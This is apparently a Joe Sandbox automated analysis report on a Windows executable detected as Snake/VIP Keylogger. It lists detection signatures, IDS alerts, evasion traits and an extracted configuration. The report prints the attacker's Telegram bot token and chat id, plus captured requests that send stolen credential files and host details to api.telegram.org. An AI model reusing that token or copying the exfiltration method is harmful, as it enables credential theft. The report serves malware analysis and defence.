Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
(renamed file extension from exe_ to exe)
Original sample name:1.exe_
Analysis ID:1635792
MD5:42c59a0f0324193d4bace2a0a51b2549
SHA1:abae2b49cf77c3e8a366cf3f878c25e0fcbe99d9
SHA256:894e43ae00f824e11ff33498771662f96e34ee028f3a0f292bec74fa0032bcc2
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1.exe (PID: 8280 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 42C59A0F0324193D4BACE2A0A51B2549)
    • RegSvcs.exe (PID: 8304 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY", "Chat id": "-4712085167"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY", "Chat_id": "-4712085167", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d3c4:$a1: get_encryptedPassword
        • 0x2d6e5:$a2: get_encryptedUsername
        • 0x2d1d4:$a3: get_timePasswordChanged
        • 0x2d2dd:$a4: get_passwordField
        • 0x2d3da:$a5: set_encryptedPassword
        • 0x2eac2:$a7: get_logins
        • 0x2ea25:$a10: KeyLoggerEventArgs
        • 0x2e68a:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.1.exe.3c60000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.1.exe.3c60000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.1.exe.3c60000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.1.exe.3c60000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  0.2.1.exe.3c60000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-12T00:55:36.678266+010028033053Unknown Traffic192.168.2.549714104.21.96.1443TCP
                    2025-03-12T00:55:40.555744+010028033053Unknown Traffic192.168.2.549717104.21.96.1443TCP
                    2025-03-12T00:55:43.701266+010028033053Unknown Traffic192.168.2.549720104.21.96.1443TCP
                    2025-03-12T00:55:57.317273+010028033053Unknown Traffic192.168.2.549728104.21.96.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-12T00:55:20.302623+010028032742Potentially Bad Traffic192.168.2.549708104.26.12.205443TCP
                    2025-03-12T00:55:30.844578+010028032742Potentially Bad Traffic192.168.2.549712132.226.8.16980TCP
                    2025-03-12T00:55:34.485232+010028032742Potentially Bad Traffic192.168.2.549712132.226.8.16980TCP
                    2025-03-12T00:55:38.125952+010028032742Potentially Bad Traffic192.168.2.549715132.226.8.16980TCP
                    2025-03-12T00:55:41.407158+010028032742Potentially Bad Traffic192.168.2.549719132.226.8.16980TCP
                    2025-03-12T00:55:46.454384+010028032742Potentially Bad Traffic192.168.2.549722132.226.247.7380TCP
                    2025-03-12T00:55:50.341217+010028032742Potentially Bad Traffic192.168.2.549725132.226.247.7380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-12T00:56:26.732534+010018100081Potentially Bad Traffic192.168.2.549627149.154.167.220443TCP
                    2025-03-12T00:56:29.818006+010018100081Potentially Bad Traffic192.168.2.549628149.154.167.220443TCP
                    2025-03-12T00:56:32.601158+010018100081Potentially Bad Traffic192.168.2.549629149.154.167.220443TCP
                    2025-03-12T00:56:35.349543+010018100081Potentially Bad Traffic192.168.2.549630149.154.167.220443TCP
                    2025-03-12T00:56:38.053100+010018100081Potentially Bad Traffic192.168.2.549631149.154.167.220443TCP
                    2025-03-12T00:56:40.692572+010018100081Potentially Bad Traffic192.168.2.549632149.154.167.220443TCP
                    2025-03-12T00:56:43.411441+010018100081Potentially Bad Traffic192.168.2.549633149.154.167.220443TCP
                    2025-03-12T00:56:46.010344+010018100081Potentially Bad Traffic192.168.2.549634149.154.167.220443TCP
                    2025-03-12T00:56:48.634276+010018100081Potentially Bad Traffic192.168.2.549635149.154.167.220443TCP
                    2025-03-12T00:56:51.745056+010018100081Potentially Bad Traffic192.168.2.549636149.154.167.220443TCP
                    2025-03-12T00:56:54.664558+010018100081Potentially Bad Traffic192.168.2.549637149.154.167.220443TCP
                    2025-03-12T00:56:57.467680+010018100081Potentially Bad Traffic192.168.2.549638149.154.167.220443TCP
                    2025-03-12T00:57:00.214669+010018100081Potentially Bad Traffic192.168.2.549639149.154.167.220443TCP
                    2025-03-12T00:57:03.028359+010018100081Potentially Bad Traffic192.168.2.549640149.154.167.220443TCP
                    2025-03-12T00:57:05.932566+010018100081Potentially Bad Traffic192.168.2.549641149.154.167.220443TCP
                    2025-03-12T00:57:14.656477+010018100081Potentially Bad Traffic192.168.2.549643149.154.167.220443TCP
                    2025-03-12T00:57:17.155986+010018100081Potentially Bad Traffic192.168.2.549644149.154.167.220443TCP
                    2025-03-12T00:57:19.622827+010018100081Potentially Bad Traffic192.168.2.549645149.154.167.220443TCP
                    2025-03-12T00:57:22.675910+010018100081Potentially Bad Traffic192.168.2.549646149.154.167.220443TCP
                    2025-03-12T00:57:25.162729+010018100081Potentially Bad Traffic192.168.2.549647149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-12T00:56:08.981727+010018100071Potentially Bad Traffic192.168.2.549733149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 1.exeAvira: detected
                    Found malware configuration
                    Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY", "Chat id": "-4712085167"}
                    Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY", "Chat_id": "-4712085167", "Version": "4.4"}
                    Source: RegSvcs.exe.8304.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: 1.exeReversingLabs: Detection: 34%
                    Source: 1.exeVirustotal: Detection: 47%Perma Link
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Sample uses string decryption to hide its real strings
                    Source: 1.2.RegSvcs.exe.140000.0.unpackString decryptor: 7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY
                    Source: 1.2.RegSvcs.exe.140000.0.unpackString decryptor: -4712085167
                    Source: 1.2.RegSvcs.exe.140000.0.unpackString decryptor:

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49642 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49643 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49649 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49650 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49651 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49652 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49653 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49654 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49655 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49656 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49657 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49658 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49659 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49660 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49661 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49662 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49663 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49671 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49672 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49673 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49674 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49676 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49680 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49682 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49683 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49697 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49723 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49747 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000000.00000003.1353312104.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1354529321.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1.exe, 00000000.00000003.1353312104.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1354529321.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0222F475h1_2_0222F2D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0222F475h1_2_0222F4C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0222FC31h1_2_0222F98C

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49639 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49631 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49627 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49733 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49635 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49645 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49636 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49630 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49628 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49634 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49633 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49643 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49637 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49629 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49644 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49647 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49638 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49632 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49646 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49640 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49641 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficTCP traffic: 192.168.2.5:49624 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2013/03/2025%20/%2007:17:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6312a955633aHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6341edb35386Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6376081fbaa6Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd63ada00000b2Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd63e9fbc770dfHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6429c7b66857Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd647e7085e75eHost: api.telegram.orgContent-Length: 582
